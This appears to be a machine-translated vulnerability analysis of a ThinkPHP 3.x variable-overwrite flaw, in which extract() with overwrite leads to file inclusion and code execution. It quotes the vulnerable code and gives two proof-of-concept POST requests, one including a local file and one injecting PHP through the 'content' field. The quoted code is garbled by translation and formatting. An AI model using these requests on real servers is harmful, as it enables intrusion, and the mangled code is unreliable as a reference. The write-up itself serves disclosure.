Vulnerability principle
Implement your own template engine improperly, in the case of template rendering, there is an arbitrary variable coverage vulnerability.
Vulnerability Details
Vulnerability Location 1
thinkphp/library/think/view.class.php
You need to modify the configuration file to specify Tmpl_engine_type as PHP
If' php ' = = Strtolower (C (' Tmpl_engine_type ')) {Using PHP native templates//template array variable decomposition becomes independent variable extract ($this->tvar, extr_overwrite); //loading PHP template empty ($content) directly? Include $templateFile:eval ('?> '. $content);
Vulnerability Location 2
thinkphp/library/think/storage/driver/file.class.php
/** * Loading Files *@access Public *@param string $filename file name *@param array $vars incoming variable *@return void */Publicfunction load ( $filename, $vars =null) {if (!is_null ($ VARs) Extract ( $vars, extr_overwrite); Span class= "Hljs-keyword js-evernote-checked" data-evernote-id= "775" >include $filename; }
Vulnerability replication
Vulnerability service-side code:
public function test(){ $this->assign($_POST); echo $this->fetch();}
Vulnerability authentication request: For vulnerability Location 2
Post/onethink/index.php?s=/home/article/test http/1.1
host:192.168.1.24
Accept: /
Accept-language:en
user-agent:mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; trident/5.0)
Connection:close
content-type:application/x-www-form-urlencoded
Content-length:20
Filename=license.txt
Call stack
Vulnerability authentication request: For vulnerability Location 1, you can command to execute
Post/onethink/index.php?s=/home/article/test http/1.1
host:192.168.1.24
Accept: /
Accept-language:en
user-agent:mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; trident/5.0)
Connection:close
content-type:application/x-www-form-urlencoded
Content-length:24
content=<?php phpinfo ();
Call stack
Reference:
Https://mp.weixin.qq.com/s/IuKjTS0Q0VVzuoeSwqZ5Gw
Any file under Thinkphp 3.x contains (conditional) analysis